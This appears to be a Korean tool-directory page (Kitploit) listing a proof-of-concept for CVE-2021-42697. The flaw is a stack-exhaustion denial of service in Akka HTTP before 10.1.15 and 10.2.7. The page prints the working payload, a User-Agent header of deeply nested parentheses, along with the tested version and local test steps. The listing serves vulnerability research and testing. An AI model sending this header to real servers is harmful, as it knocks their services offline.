Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-42697 — CVE-2021-42697에 대한 개념 증명 익스플로잇: Akka HTTP 10.1.x(10.1.15 미만) 및 10.2.x(10.2.7 미만)는 HTTP 헤더를 파싱하는 동안 스택 고갈(stack exhaustion)이 발생할 수 있으며, 이로 인해 원격 공격자가 깊게 중첩된 주석이 포함된 User-Agent 헤더를 전송하여 서비스 거부(Denial of Service) 공격을 수행할 수 있습니다. | Kitploit
도구/GitHubGitHub/cxosmo/cve-2021-42697
Vulnerability AnalysisExploitationWeb SecurityPenetration Testing
GitHubcxosmo/cve-2021-42697

CVE-2021-42697

CVE-2021-42697에 대한 개념 증명 익스플로잇: Akka HTTP 10.1.x(10.1.15 미만) 및 10.2.x(10.2.7 미만)는 HTTP 헤더를 파싱하는 동안 스택 고갈(stack exhaustion)이 발생할 수 있으며, 이로 인해 원격 공격자가 깊게 중첩된 주석이 포함된 User-Agent 헤더를 전송하여 서비스 거부(Denial of Service) 공격을 수행할 수 있습니다.

저장소 보기
14년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Akka HTTP 10.1.x(10.1.15 미만) 및 10.2.x(10.2.7 미만)는 HTTP 헤더를 파싱하는 동안 스택 고갈(stack exhaustion)이 발생할 수 있으며, 이로 인해 원격 공격자가 깊이 중첩된 주석이 포함된 User-Agent 헤더를 전송하여 서비스 거부(DoS) 공격을 수행할 수 있습니다.

참고 자료

MITRE

Akka 블로그

주석의 임의 중첩

기본 Akka 설정 가이드

PoC 참고 사항

  • 테스트 대상 버전: 10.2.4
  • 대상 서버 핑거프린트: akka-http/<version>
  • 페이로드 스니펫: `User-Agent: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((``
  • Akka HTTP에서 스택 오버플로를 유발하여 DoS를 초래합니다.
  • scala-akka-http-server-example/ 콘텐츠를 사용하여 로컬에서 테스트할 수 있습니다(sbt > compile > run으로 http://localhost:8082에서 실행됨).
  • 도구 다운로드